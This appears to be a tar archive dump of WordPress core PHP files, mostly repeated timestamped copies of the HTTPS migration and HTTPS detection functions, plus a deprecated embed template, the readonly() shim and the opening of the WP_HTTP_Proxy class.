// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
embed-template-20260621181319.php 0000666 00000000522 15224151220 0011526 0 ustar 00 <?php
/**
* Back-compat placeholder for the base embed template
*
* @package WordPress
* @subpackage oEmbed
* @since 4.4.0
* @deprecated 4.5.0 Moved to wp-includes/theme-compat/embed.php
*/
_deprecated_file( basename( __FILE__ ), '4.5.0', WPINC . '/theme-compat/embed.php' );
require ABSPATH . WPINC . '/theme-compat/embed.php';
https-migration-20260605091014.php 0000666 00000011205 15224151220 0011764 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605114554-20260621081201-20260621145627.php 0000666 00000013341 15224151220 0014726 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
readonly-20260604224139.php 0000666 00000002345 15224151220 0010462 0 ustar 00 <?php
/**
* Conditionally declares a `readonly()` function, which was renamed
* to `wp_readonly()` in WordPress 5.9.0.
*
* In order to avoid PHP parser errors, this function was extracted
* to this separate file and is only included conditionally on PHP < 8.1.
*
* Including this file on PHP >= 8.1 results in a fatal error.
*
* @package WordPress
* @since 5.9.0
*/
/**
* Outputs the HTML readonly attribute.
*
* Compares the first two arguments and if identical marks as readonly.
*
* This function is deprecated, and cannot be used on PHP >= 8.1.
*
* @since 4.9.0
* @deprecated 5.9.0 Use wp_readonly() introduced in 5.9.0.
*
* @see wp_readonly()
*
* @param mixed $readonly_value One of the values to compare.
* @param mixed $current Optional. The other value to compare if not just true.
* Default true.
* @param bool $display Optional. Whether to echo or just return the string.
* Default true.
* @return string HTML attribute or empty string.
*/
function readonly( $readonly_value, $current = true, $display = true ) {
_deprecated_function( __FUNCTION__, '5.9.0', 'wp_readonly()' );
return wp_readonly( $readonly_value, $current, $display );
}
https-migration-20260606010046-20260621081103.php 0000666 00000011205 15224151220 0013336 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260605170751.php 0000666 00000011205 15224151220 0011772 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260606083005-20260621081103.php 0000666 00000013341 15224151220 0013333 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605134935-20260621081205.php 0000666 00000013341 15224151220 0013346 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-http-proxy-20260621093249.php 0000666 00000013534 15224151220 0012541 0 ustar 00 <?php
/**
* HTTP API: WP_HTTP_Proxy class
*
* @package WordPress
* @subpackage HTTP
* @since 4.4.0
*/
/**
* Core class used to implement HTTP API proxy support.
*
